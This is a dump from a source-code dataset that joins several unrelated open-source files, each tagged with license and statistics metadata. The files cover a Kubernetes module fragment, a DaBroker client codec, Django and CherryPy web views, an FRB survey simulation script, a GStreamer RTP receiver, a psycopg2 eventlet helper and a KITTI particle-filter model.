for port in ports:
result.append(dict(containerPort=port))
return result
def main():
manager = K8SDeploymentManager()
results = manager.exec_module()
manager.exit_json(**results)
if __name__ == '__main__':
main()
| lgpl-3.0 | 7,921,536,518,088,795,000 | 33.74717 | 131 | 0.535947 | false | 4.474247 | false | false | false |
smurfix/DaBroker | dabroker/client/codec.py | 1 | 10644 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This file is part of DaBroker, a distributed data access manager.
##
## DaBroker is Copyright © 2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.rst` for details,
## including optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
from weakref import ref,WeakValueDictionary
from functools import partial
from . import ClientBaseRef,ClientBaseObj
from ..base import BaseRef,BaseObj, BrokeredInfo, BrokeredInfoInfo, adapters as baseAdapters, common_BaseObj,common_BaseRef, NoData,ManyData
from ..base.service import current_service
import logging
logger = logging.getLogger("dabroker.client.serial")
class _NotGiven: pass
class CacheProxy(object):
"""Can't weakref a string, so …"""
def __init__(self,data):
self.data = data
def kstr(v):
k = getattr(v,'__dict__',None)
if k is not None:
k = k.get('_key',None)
if k is not None:
return '.'.join(str(x) for x in k.key)
else:
return str(v)
def search_key(a,**kw):
"""Build a reproducible string from search keywords"""
if a is None:
a = ()
return ','.join(kstr(v) for v in a) + '|' + ','.join('{}:{}'.format(k, kstr(v)) for k,v in sorted(kw.items()))
# This is the client's adapter storage.
adapters = baseAdapters[:]
def codec_adapter(cls):
adapters.append(cls)
return cls
# This is a list of special metaclasses, by key,
_registry = {}
def baseclass_for(*k):
"""\
Register a base class for a specific object type.
@k is the meta object's key tuple.
See test11 for an example which overrides the root object.
If your client class duplicates an attribute, it takes
precedence: the server's value of that attribute will not be
accessible.
Usage:
@baseclass_for("static","root","meta")
class MyRoot(ClientBaseObj):
def check_me(self):
return "This is a client-specific class"
You can use `None` as the last value (only), which behaves like an
any-single value placeholder.
"""
def proc(fn):
_registry[k] = fn
return fn
return proc
class ClientBrokeredInfo(ClientBaseObj,BrokeredInfo):
"""\
This is the base class for client-side meta objects.
"""
def __init__(self,*a,**k):
super(ClientBrokeredInfo,self).__init__(*a,**k)
self.searches = WeakValueDictionary()
self._class = None
def __call__(self, _is_meta=False, *a,**kw):
"""\
Return the class to use for objects with this as metaclass
"""
cls = self._class
if cls is None:
k = self._key.key
cls = _registry.get(k,None)
if cls is None:
# Allow a single wildcard at the end
cls = _registry.get((k[:-1])+(None,),object)
if _is_meta:
class ClientInfo(ClientBrokeredInfo,cls):
pass
else:
class ClientInfo(ClientBaseObj,cls):
pass
cls = ClientInfo
for k in self.fields.keys():
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,FieldProperty(k))
for k in self.refs.keys():
if k != '_meta':
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,RefProperty(k))
for k,v in self.backrefs.items():
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,BackRefProperty(k,v))
for k,v in self.calls.items():
if not hasattr(cls,k):
setattr(cls,k,RpcProperty(v))
self._class = cls
return cls(*a,**kw)
def find(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
for r in self.client.find(self, _cached=self._dab_cached, **kw):
if not isinstance(r,BaseObj):
r = r()
yield r
def get(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
res = list(self.client.find(self, _limit=2,_cached=self._dab_cached, **kw))
if len(res) == 0:
raise NoData(cls=self,**kw)
elif len(res) == 2:
raise ManyData(cls=self,**kw)
else:
res = res[0]
if not isinstance(res,BaseObj):
res = res()
return res
def count(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
return self.client.count(self, _cached=self._dab_cached, **kw)
def __repr__(self):
k=getattr(self,'_key',None)
if not k or not hasattr(self,'name'):
return super(ClientBrokeredInfo,self).__repr__()
return '‹I:{}:{}›'.format(self.name, '¦'.join(str(x) for x in k))
__str__=__unicode__=__repr__
class _ClientInfo(ClientBrokeredInfo):
"""Mix-in class for meta objects"""
_name = None
def __init__(self,*a,**k):
super(_ClientInfo,self).__init__(*a,**k)
class ClientBrokeredInfoInfo(ClientBrokeredInfo,BrokeredInfoInfo):
"""\
This is the client-side singleton meta object
(the root of DaBroker's object system)
"""
pass
client_broker_info_meta = ClientBrokeredInfoInfo()
class FieldProperty(object):
"""This property accessor handles updating non-referential attributes."""
# Note that there is no `__get__` method. It is not necessary,
# the value is stored in the object's `__dict__`;
# Python will get it from there.
def __init__(self, name):
self.name = name
def __set__(self, obj, val):
ov = obj.__dict__.get(self.name,_NotGiven)
obj.__dict__[self.name] = val
if ov is _NotGiven:
return
if obj._meta is None:
assert not ov or ov == val, (self.name,ov,val)
else:
import pdb;pdb.set_trace()
obj._meta._dab.obj_change(obj, self.name, ov,val)
class RefProperty(object):
"""This property accessor handles referred objects"""
def __init__(self, name):
self.name = name
def __get__(self, obj, type=None):
if obj is None:
return self
k = obj._refs.get(self.name,None)
if k is None:
return None
return obj._meta._dab.get(k)
def __set__(self, obj, val):
ov = obj._refs.get(self.name,_NotGiven)
if val is not None:
val = val._key
obj._refs[self.name] = val
if ov is _NotGiven:
return
obj._meta._dab.obj_change(obj, self.name, ov,val)
class BackRefProperty(object):
"""This property accessor handles retrieving one-to-many relationships"""
def __init__(self, name,refobj):
self.name = name
self.ref = ref(refobj)
def __get__(self, obj, type=None):
if obj is None:
return self
k = obj._refs.get(self.name,None)
if k is None:
            k = obj._refs[self.name] = BackRefHandler(obj, self.name, self.ref)
return k
class BackRefHandler(object):
"""Manage a specific back reference"""
def __init__(self, obj, name,refobj):
self.obj = ref(obj)
self.name = name
self.ref = refobj
def _deref(self):
obj = self.obj()
ref = self.ref()
if obj is None or ref is None:
raise RuntimeError("weak ref: should not have been freed")
return obj,ref
def __getitem__(self,i):
obj,ref = self._deref()
res = obj._meta._dab.send("backref_idx",obj, self.name,i)
if isinstance(res,BaseRef):
res = res()
return res
def __len__(self):
obj,ref = self._deref()
return obj._meta._dab.send("backref_len",obj, self.name)
class RpcProperty(object):
"""This property accessor returns a shim which executes a RPC to the server."""
def __init__(self, proc, base=None):
self.name = proc.name
self.cached = getattr(proc,'cached',False)
self.for_class = getattr(proc,'for_class',None)
self.meta = getattr(proc,'meta',False)
self.base = base
def _do_call(self,obj, *a,**k):
with obj._dab.env:
if self.cached and not obj._obsolete:
kws = self.name+':'+search_key(a,**k)
ckey = " ".join(str(x) for x in obj._key.key)+":"+kws
res = obj._call_cache.get(kws,_NotGiven)
if res is not _NotGiven:
res = res.data
current_service.top._cache[ckey] # Lookup to increase counter
return res
res = obj._meta._dab.call(obj,self.name, a,k, _meta=self.meta)
if self.cached and not obj._obsolete:
rc = CacheProxy(res)
obj._call_cache[kws] = rc
current_service.top._cache[ckey] = rc
return res
def __get__(self, obj, type=None):
if self.for_class is None: # normal method
if obj is None:
return self
else: # static- or classmethod
obj=type
c = partial(RpcProperty._do_call, self,obj)
c.__name__ = str(self.name)
return c
def __call__(self, *a,**k):
# direct call, "classmethod"
assert self.base is not None
return self._do_call(self.base, *a,**k)
@codec_adapter
class client_BaseRef(common_BaseRef):
cls = ClientBaseRef
@staticmethod
def decode(k,c=None):
return ClientBaseRef(key=tuple(k),code=c)
@codec_adapter
class client_BaseObj(common_BaseObj):
@classmethod
def encode_ref(obj,k):
"""\
Encode a reference, without loading the actual object.
(Since we can't load the object without encoding a reference for it, that'd be somewhat difficult.)
"""
ref = obj._refs[k]
if ref is not None:
import pdb;pdb.set_trace()
ref = ClientBaseRef(meta=obj._meta, key=obj._key)
return ref
@classmethod
def decode(cls, k,c=None,f=None,r=None, _is_meta=False):
"""\
Convert this object to a class
"""
k = ClientBaseRef(key=tuple(k),code=c)
if not r or '_meta' not in r:
raise RuntimeError("Object without meta data")
m = r['_meta']
if not isinstance(m,ClientBrokeredInfo):
# assume it's a reference, so resolve it
r['_meta'] = m = m()
res = m(_is_meta)
res._key = k
# Got the class, now fill it with data
if f:
for k,v in f.items():
res.__dict__[k] = v
# do not use setattr here, it tries to record a change
if r:
for k,v in r.items():
if k == '_meta':
res._meta = v
else:
res._refs[k] = v
if f and _is_meta and 'calls' in f:
c = f['calls']
for k,v in c.items():
if getattr(v,'for_class',False):
res.__dict__[k] = RpcProperty(v,res)
pass
return current_service.top._add_to_cache(res)
@codec_adapter
class client_InfoObj(client_BaseObj):
cls = ClientBrokeredInfo
clsname = "Info"
@staticmethod
def decode(k=None,c=None,f=None, **kw):
if f is None:
# We always need the data, but this is something like a ref,
# so we need to go and get the real thing.
# NOTE this assumes that the codec doesn't throw away empty lists.
return ClientBaseRef(key=k,code=c)()
res = client_BaseObj.decode(_is_meta=True, k=k,c=c,f=f,**kw)
res.client = current_service.top
return res
@codec_adapter
class client_InfoMeta(object):
cls = ClientBrokeredInfoInfo
clsname = "_ROOT"
@staticmethod
def encode(obj, include=False):
return {}
@staticmethod
def decode(**attr):
return client_broker_info_meta
| gpl-3.0 | -5,950,866,018,713,775,000 | 25.984772 | 140 | 0.659142 | false | 2.935395 | false | false | false |
tongfa/vent | wserve/wserve/views.py | 1 | 1406 | from django.http import HttpResponse
from django.template.loader import get_template
from django.template import Context
from wserve.settings import VENT_WD, VENT_WWW_CLIENT_EP
import cPickle as pickle
import json, time, os
def address2key(address):
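    # Pack an (ip, port) tuple into a single integer: 8 bits per IPv4 octet, then 16 bits for the port.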
r = 0
for s in address[0].split('.'):
r = r << 8
r += int(s)
r = r << 16
r += address[1]
return r
def index(request):
t = get_template('index.html')
return HttpResponse(t.render(Context()))
def audio(request):
t = get_template('audio.html')
return HttpResponse(t.render(Context()))
def longcall(request):
time.sleep(1)
def url(c):
ep = VENT_WWW_CLIENT_EP
return 'http://%s%s/camera/%d/' % (
ep[0],
'' if ep[1] == 80 else ':%d' % ep[1],
address2key(c))
cameraList = os.listdir("%s" % VENT_WD)
if cameraList is None:
import code
code.interact(local=vars())
cameraList.sort()
cameraListIp = [pickle.load(open("%s/%s" % (VENT_WD, name), 'r'))
for name in cameraList]
# unique value, url, name
connList = [(address2key(c),url(c),c[0]) for c in cameraListIp]
response_data = {}
response_data['result'] = 'OK'
response_data['message'] = {'cameras': connList}
print response_data
return HttpResponse(json.dumps(response_data), content_type="application/json")
| mit | 2,273,925,697,469,779,000 | 28.914894 | 83 | 0.604552 | false | 3.437653 | false | false | false |
herqles-io/hq-manager | src/hqmanager/api/user.py | 1 | 5040 | import cherrypy
class UserAPIController(object):
exposed = True
def __init__(self, identity, assignment):
self.identity = identity
self.assignment = assignment
def index(self):
return "User api Index"
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
@cherrypy.tools.auth(permission="herqles.user.add")
def add(self):
data = cherrypy.request.json
if 'username' not in data:
raise cherrypy.HTTPError(400, "Missing username")
if 'password' not in data:
raise cherrypy.HTTPError(400, "Missing Password")
output = {'username': data['username'], 'identity': False, 'assignment': False}
if not self.identity.user_exists(data['username']):
self.identity.create_user(data['username'], data['password'])
output['identity'] = True
if not self.assignment.has_assignment(data['username']):
self.assignment.create_assignment(data['username'])
output['assignment'] = True
return output
@cherrypy.tools.json_out()
    @cherrypy.tools.auth()  # if the requested username is the requester's own, skip the permission check below
def get(self, username):
headers = cherrypy.request.headers
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if username != cherrypy.request.user['name']:
if not self.assignment.has_permission_token(headers['X-Auth-Token'], 'herqles.user.get'):
raise cherrypy.HTTPError(403, "Invalid permissions")
permissions = self.assignment.get_permissions(username)
return {'username': username, 'permissions': permissions}
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.delete")
def delete(self, username):
output = {'username': username, 'identity': False, 'assignment': False}
        if self.identity.user_exists(username):
            self.identity.delete_user(username)
            output['identity'] = True
        if self.assignment.has_assignment(username):
            self.assignment.delete_assignment(username)
            output['assignment'] = True
return output
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
def get_token(self):
data = cherrypy.request.json
if 'username' not in data or 'password' not in data:
raise cherrypy.HTTPError(400, "Username and password required")
if not self.identity.auth(data['username'], data['password']):
raise cherrypy.HTTPError(401, "Invalid username or password")
if not self.assignment.has_assignment(data['username']):
raise cherrypy.HTTPError(404, "User does not exist")
(token, expire_at) = self.assignment.get_token(data['username'])
return {"token": token, 'expire_at': long(expire_at)}
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
@cherrypy.tools.auth() # We only need to check permissions sometimes
def change_password(self):
headers = cherrypy.request.headers
data = cherrypy.request.json
if 'username' not in data:
raise cherrypy.HTTPError(400, "Missing username")
if 'password' not in data:
raise cherrypy.HTTPError(400, "Missing password")
if data['username'] != cherrypy.request.user['name']:
if not self.assignment.has_permission_token(headers['X-Auth-Token'], 'herqles.user.password'):
raise cherrypy.HTTPError(403, "Invalid permissions")
self.identity.change_password(data['username'], data['password'])
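        # force=True presumably rotates the stored token, so tokens issued before the password change stop working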
self.assignment.get_token(data['username'], force=True)
return {'username': data['username']}
@cherrypy.tools.json_in()
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.permission.add")
def add_permission(self):
data = cherrypy.request.json
username = data['username']
permission = data['permission']
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if self.assignment.has_permission_user(username, permission):
raise cherrypy.HTTPError(409, "User already has permission "+permission)
self.assignment.add_permission(username, permission)
return data
@cherrypy.tools.json_in()
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.permission.delete")
def remove_permission(self):
data = cherrypy.request.json
username = data['username']
permission = data['permission']
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if self.assignment.has_permission_user(username, permission, exact=True) is False:
raise cherrypy.HTTPError(409, "User does not have permission "+permission)
        # Assumption: the assignment backend exposes remove_permission(), mirroring add_permission() used above
        self.assignment.remove_permission(username, permission)
        return data
| mit | 5,361,003,477,038,764,000 | 34.244755 | 106 | 0.644444 | false | 4.315068 | false | false | false |
davidgardenier/frbpoppy | tests/dm_snr/future.py | 1 | 6523 | """Check the log N log F slope for future surveys."""
import numpy as np
import matplotlib.pyplot as plt
from copy import copy
from frbpoppy import CosmicPopulation, Survey, LargePopulation, SurveyPopulation, hist
from frbpoppy import unpickle, pprint
import frbpoppy.direction_dists as did
import frbpoppy.galacticops as go
from tests.convenience import plot_aa_style, rel_path
from tests.rates.alpha_real import EXPECTED
MAKE = True
SURVEYS = ('parkes-htru',
'wsrt-apertif',
'fast-crafts',
'puma-full',
'chord',
'ska1-low',
'ska1-mid')
SIZE = 5e4
if MAKE:
# Calculate the fraction of the sky that the survey covers
surv_f_area = {}
for name in SURVEYS:
pop = CosmicPopulation.simple(5e5)
pop.gen_direction()
survey = Survey(name)
mask = survey.in_region(pop.frbs.ra, pop.frbs.dec,
pop.frbs.gl, pop.frbs.gb)
in_surv_region = np.sum(mask)
tot_region = len(mask)
area_sky = 4*np.pi*(180/np.pi)**2 # In sq. degrees
f_area = (survey.beam_size/area_sky)*(tot_region/in_surv_region)
surv_f_area[name] = f_area
print(f'{name} covers {f_area*100}% of the sky')
surv_pops = []
for name in SURVEYS:
# Set up survey
survey = Survey(name)
if name in ('parkes-htru', 'wsrt-apertif'):
survey.set_beam(model=name)
# Set up CosmicPopulation
pop = CosmicPopulation.optimal(SIZE, generate=False)
# Only generate FRBs in the survey region
pop.set_direction(model='uniform',
min_ra=survey.ra_min,
max_ra=survey.ra_max,
min_dec=survey.dec_min,
max_dec=survey.dec_max)
# Parkes also has galactic limits:
if name == 'parkes-htru':
pop.gen_index()
pop.gen_dist()
pop.gen_time()
# Generate FRBs just within the galactic constraints
pop.gen_direction()
# Gather ra, dec coordinate limits
lims = {'min_ra': survey.ra_min, 'max_ra': survey.ra_max,
'min_dec': survey.dec_min, 'max_dec': survey.dec_max}
def sample(n_gen):
ra, dec = did.uniform(n_srcs=n_gen, **lims)
gl, gb = go.radec_to_lb(ra, dec, frac=True)
coords = [ra, dec, gl, gb]
return coords
def accept(coords):
return survey.in_region(*coords)
coords = sample(int(SIZE))
mask = accept(coords)
reject, = np.where(~mask)
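            # Rejection sampling: redraw coordinates for every source that fell outside the survey region
            # until all sources are accepted.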
while reject.size > 0:
fill = sample(reject.size)
mask = accept(fill)
for i in range(len(coords)):
coords[i][reject[mask]] = fill[i][mask]
reject = reject[~mask]
# Assign the values
frbs = pop.frbs
frbs.ra, frbs.dec = coords[0], coords[1]
frbs.gl, frbs.gb = coords[2], coords[3]
# Continue with generation
pop.gen_gal_coords()
pop.gen_dm()
pop.gen_w()
pop.gen_lum()
pop.gen_si()
else:
pop.generate()
surv_pop = SurveyPopulation(pop, survey, scale_by_area=False)
surv_pop.source_rate.f_area = surv_f_area[name]
surv_pop.source_rate.scale_by_area()
# surv_pop.save()
surv_pops.append(surv_pop)
else:
surv_pops = []
for name in SURVEYS:
surv_pops.append(unpickle(f'optimal_{name}'))
# Start plot
plot_aa_style(cols=2)
plt.rcParams["figure.figsize"] = (3.556*3, 3.556)
fig, axes = plt.subplots(1, 3)
for ax in axes.flatten():
ax.set_aspect('auto')
# Get norm pop
y = 0
ys = []
names = []
rates = []
norm_sim_rate = surv_pops[0].source_rate.det
norm_real_rate = EXPECTED['parkes-htru'][0] / EXPECTED['parkes-htru'][1]
norm_rate = norm_sim_rate / norm_real_rate
for i, surv_pop in enumerate(surv_pops):
name = surv_pop.name.split('_')[-1]
pprint(name)
if surv_pop.n_sources() == 0:
print(surv_pop.source_rate)
print(f'{name} | no FRBs in population')
continue
names.append(name)
ys.append(y)
# Dimensions measure plot
ax = axes[0]
ax.set_xlabel(r'DM ($\textrm{pc}\ \textrm{cm}^{-3}$)')
ax.set_ylabel(r'\#')
ax.set_yscale('log')
bins, values = hist(surv_pop.frbs.dm, bin_type='lin', norm='frac',
n_bins=20)
values = values.astype(np.float64)
values *= float(surv_pop.source_rate.f_area)*1e6
ax.step(bins, values, where='mid', label=name)
# Fluence plot
ax = axes[1]
ax.set_xlabel('S/N')
ax.set_xscale('log')
ax.set_ylabel(r'\#(${>}\text{S/N}$)')
ax.set_yscale('log')
# Update fluence plot
bins, values = hist(surv_pop.frbs.snr, bin_type='log', norm='frac',
n_bins=25)
# Cumulative sum
values = np.cumsum(values[::-1])[::-1]
values = values.astype(np.float64)
values *= float(surv_pop.source_rate.f_area)*1e6
ax.step(bins, values, where='mid', label=name)
# Plot rates
ax = axes[2]
ax.set_xscale('log')
ax.set_xlabel(r'Rate (day$^{-1}$)')
rate = surv_pop.source_rate.det/norm_rate
print(f'rate: {rate}')
line = ax.errorbar(rate, y,
fmt='x',
label=rf'{name}')
ax.grid()
rates.append(rate)
y += 1
ax.yaxis.tick_right()
ax.set_yticks(ys)
ax.set_yticklabels(names)
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
for i, y in enumerate(ax.get_yticklabels()):
y.set_color(colors[i])
ax.invert_yaxis() # labels read top-to-bottom
# Add thin grey horizontal lines
x_lim = ax.get_xlim()
ax.set_xlim(x_lim)
for i, y in enumerate(ys):
ax.plot((x_lim[0], rates[i]), (y, y), color='k', lw=0.5, zorder=0, ls='--')
for e in list(zip(SURVEYS, rates)):
pprint(e)
euclidean_lines = True
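# The reference lines drawn below have slope -3/2, the Euclidean log N(>S/N) vs log S/N source-count slope.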
if euclidean_lines:
xlims = axes[1].get_xlim()
ylims = axes[1].get_ylim()
axes[1].set_xlim(xlims)
axes[1].set_ylim(ylims)
xs = np.logspace(np.log10(xlims[0]),
np.log10(xlims[1]),
100)
for n in range(-10, 15):
ys = 10**((np.log10(xs)+n)*-1.5)
axes[1].plot(xs, ys, 'k:', linewidth=0.25)
# plt.legend()
plt.tight_layout()
plt.savefig(rel_path('./plots/future_surveys.pdf'))
| mit | 1,674,763,514,524,134,700 | 28.251121 | 86 | 0.555879 | false | 3.08708 | false | false | false |
i02sopop/Kirinki | gstreamer/examples/video_receiver.py | 1 | 2317 | #!/usr/bin/env python
# -=- encoding: utf-8 -=-
################ VIDEO RECEIVER
import gobject, pygst
pygst.require("0.10")
import gst
# TODO: detect from the RTPSource element inside the GstRtpBin
REMOTE_HOST = '192.168.34.150'
READ_VIDEO_CAPS = 'video.caps'
pipeline = gst.Pipeline('server')
caps = open(READ_VIDEO_CAPS).read().replace('\\', '')
rtpbin = gst.element_factory_make('gstrtpbin', 'rtpbin')
rtpbin.set_property('latency', 400)
udpsrc_rtpin = gst.element_factory_make('udpsrc', 'udpsrc0')
udpsrc_rtpin.set_property('port', 10000)
udpsrc_caps = gst.caps_from_string(caps)
udpsrc_rtpin.set_property('caps', udpsrc_caps)
udpsrc_rtcpin = gst.element_factory_make('udpsrc', 'udpsrc1')
udpsrc_rtcpin.set_property('port', 10001)
udpsink_rtcpout = gst.element_factory_make('udpsink', 'udpsink0')
udpsink_rtcpout.set_property('host', REMOTE_HOST)
udpsink_rtcpout.set_property('port', 10002)
rtph264depay = gst.element_factory_make('rtph264depay', 'rtpdepay')
q1 = gst.element_factory_make("queue", "q1")
q2 = gst.element_factory_make("queue", "q2")
avimux = gst.element_factory_make('avimux', 'avimux')
filesink = gst.element_factory_make('filesink', 'filesink')
filesink.set_property('location', '/tmp/go.avi')
ffmpegcs = gst.element_factory_make("ffmpegcolorspace", "ffmpegcs")
ffdec264 = gst.element_factory_make('ffdec_h264', 'ffdec264')
autovideosink = gst.element_factory_make('autovideosink')
pipeline.add(rtpbin, udpsrc_rtpin, udpsrc_rtcpin, udpsink_rtcpout,
rtph264depay, q1, avimux, ffdec264, autovideosink)
# Receive the RTP and RTCP streams
udpsrc_rtpin.link_pads('src', rtpbin, 'recv_rtp_sink_0')
udpsrc_rtcpin.link_pads('src', rtpbin, 'recv_rtcp_sink_0')
# reply with RTCP stream
rtpbin.link_pads('send_rtcp_src_0', udpsink_rtcpout, 'sink')
# Plus the RTP into the rest of the pipe...
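# gstrtpbin creates its recv_rtp_src pads dynamically once RTP packets arrive,
# so the depayloader can only be linked from the 'pad-added' callback below.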
def rtpbin_pad_added(obj, pad):
print "PAD ADDED"
print " obj", obj
print " pad", pad
rtpbin.link(rtph264depay)
rtpbin.connect('pad-added', rtpbin_pad_added)
gst.element_link_many(rtph264depay, q1, ffdec264, autovideosink)
def start():
pipeline.set_state(gst.STATE_PLAYING)
udpsink_rtcpout.set_locked_state(gst.STATE_PLAYING)
print "Started..."
def loop():
print "Running..."
gobject.MainLoop().run()
if __name__ == '__main__':
start()
loop()
| agpl-3.0 | -9,069,301,017,670,709,000 | 33.073529 | 67 | 0.70738 | false | 2.565891 | false | false | false |
cloudysunny14/CloudySwitch | cloudyswitch/app/psyco_eventlet.py | 1 | 2308 | """A wait callback to allow psycopg2 cooperation with eventlet.
Use `make_psycopg_green()` to enable eventlet support in Psycopg.
"""
# Copyright (C) 2010 Daniele Varrazzo <[email protected]>
# and licensed under the MIT license:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import psycopg2
from psycopg2 import extensions
from eventlet.hubs import trampoline
LOG = logging.getLogger(__name__)
def make_psycopg_green():
"""Configure Psycopg to be used with eventlet in non-blocking way."""
if not hasattr(extensions, 'set_wait_callback'):
raise ImportError(
"support for coroutines not available in this Psycopg version (%s)"
% psycopg2.__version__)
extensions.set_wait_callback(eventlet_wait_callback)
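# Example usage (illustrative sketch; the DSN below is an assumption, not part of this module):
#
#   make_psycopg_green()
#   conn = psycopg2.connect("dbname=test")
#   # psycopg2's blocking waits now yield to the eventlet hub via trampoline()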
def eventlet_wait_callback(conn, timeout=-1):
"""A wait callback useful to allow eventlet to work with Psycopg."""
while 1:
state = conn.poll()
if state == extensions.POLL_OK:
break
elif state == extensions.POLL_READ:
trampoline(conn.fileno(), read=True)
elif state == extensions.POLL_WRITE:
trampoline(conn.fileno(), write=True)
else:
raise psycopg2.OperationalError(
"Bad result from poll: %r" % state)
| apache-2.0 | -6,447,168,683,168,695,000 | 42.54717 | 79 | 0.717938 | false | 4.204007 | false | false | false |
tu-rbo/differentiable-particle-filters | methods/dpf_kitti.py | 1 | 43029 | import os
import numpy as np
import sonnet as snt
import tensorflow as tf
import matplotlib.pyplot as plt
from utils.data_utils_kitti import wrap_angle, compute_statistics, split_data, make_batch_iterator, make_repeating_batch_iterator, rotation_matrix, load_data_for_stats
from utils.method_utils import atan2, compute_sq_distance
from utils.plotting_utils import plot_maze, show_pause
from datetime import datetime
if tf.__version__ == '1.1.0-rc1' or tf.__version__ == '1.2.0':
from tensorflow.python.framework import ops
@ops.RegisterGradient("FloorMod")
def _mod_grad(op, grad):
x, y = op.inputs
gz = grad
x_grad = gz
y_grad = None # tf.reduce_mean(-(x // y) * gz, axis=[0], keep_dims=True)[0]
return x_grad, y_grad
class DPF():
def __init__(self, init_with_true_state, learn_odom, use_proposer, propose_ratio, proposer_keep_ratio, min_obs_likelihood, learn_gaussian_mle):
"""
:param init_with_true_state:
:param learn_odom:
:param use_proposer:
:param propose_ratio:
:param particle_std:
:param proposer_keep_ratio:
:param min_obs_likelihood:
"""
# store hyperparameters which are needed later
self.init_with_true_state = init_with_true_state
self.learn_odom = learn_odom
self.use_proposer = use_proposer and not init_with_true_state # only use proposer if we do not initializet with true state
self.propose_ratio = propose_ratio if not self.init_with_true_state else 0.0
# define some more parameters and placeholders
self.state_dim = 5
self.action_dim = 3
self.observation_dim = 6
self.placeholders = {'o': tf.placeholder('float32', [None, None, 50, 150, self.observation_dim], 'observations'),
'a': tf.placeholder('float32', [None, None, 3], 'actions'),
's': tf.placeholder('float32', [None, None, 5], 'states'),
'num_particles': tf.placeholder('float32'),
'keep_prob': tf.placeholder_with_default(tf.constant(1.0), []),
'is_training': tf.placeholder_with_default(tf.constant(False), [])
}
self.num_particles_float = self.placeholders['num_particles']
self.num_particles = tf.to_int32(self.num_particles_float)
# build learnable modules
self.build_modules(min_obs_likelihood, proposer_keep_ratio, learn_gaussian_mle)
def build_modules(self, min_obs_likelihood, proposer_keep_ratio, learn_gaussian_mle):
"""
:param min_obs_likelihood:
:param proposer_keep_ratio:
:return: None
"""
# MEASUREMENT MODEL
# conv net for encoding the image
self.encoder = snt.Sequential([
snt.nets.ConvNet2D([16, 16, 16, 16], [[7, 7], [5, 5], [5, 5], [5, 5]], [[1,1], [1, 2], [1, 2], [2, 2]], [snt.SAME], activate_final=True, name='encoder/convnet'),
snt.BatchFlatten(),
lambda x: tf.nn.dropout(x, self.placeholders['keep_prob']),
snt.Linear(128, name='encoder/linear'),
tf.nn.relu
])
# observation likelihood estimator that maps states and image encodings to probabilities
self.obs_like_estimator = snt.Sequential([
snt.Linear(128, name='obs_like_estimator/linear'),
tf.nn.relu,
snt.Linear(128, name='obs_like_estimator/linear'),
tf.nn.relu,
snt.Linear(1, name='obs_like_estimator/linear'),
tf.nn.sigmoid,
lambda x: x * (1 - min_obs_likelihood) + min_obs_likelihood
], name='obs_like_estimator')
# motion noise generator used for motion sampling
if learn_gaussian_mle:
self.mo_noise_generator = snt.nets.MLP([32, 32, 4], activate_final=False, name='mo_noise_generator')
else:
self.mo_noise_generator = snt.nets.MLP([32, 32, 2], activate_final=False, name='mo_noise_generator')
# odometry model (if we want to learn it)
if self.learn_odom:
self.mo_transition_model = snt.nets.MLP([128, 128, 128, self.state_dim], activate_final=False, name='mo_transition_model')
# particle proposer that maps encodings to particles (if we want to use it)
if self.use_proposer:
self.particle_proposer = snt.Sequential([
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
lambda x: tf.nn.dropout(x, proposer_keep_ratio),
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(128, name='particle_proposer/linear'),
tf.nn.relu,
snt.Linear(4, name='particle_proposer/linear'),
tf.nn.tanh,
])
self.noise_scaler1 = snt.Module(lambda x: x * tf.exp(10 * tf.get_variable('motion_sampler/noise_scaler1', initializer=np.array(0.0, dtype='float32'))))
self.noise_scaler2 = snt.Module(lambda x: x * tf.exp(10 * tf.get_variable('motion_sampler/noise_scaler2', initializer=np.array(0.0, dtype='float32'))))
def custom_build(self, inputs):
"""A custom build method to wrap into a sonnet Module."""
outputs = snt.Conv2D(output_channels=16, kernel_shape=[7, 7], stride=[1, 1])(inputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[1, 2])(outputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[1, 2])(outputs)
outputs = tf.nn.relu(outputs)
outputs = snt.Conv2D(output_channels=16, kernel_shape=[5, 5], stride=[2, 2])(outputs)
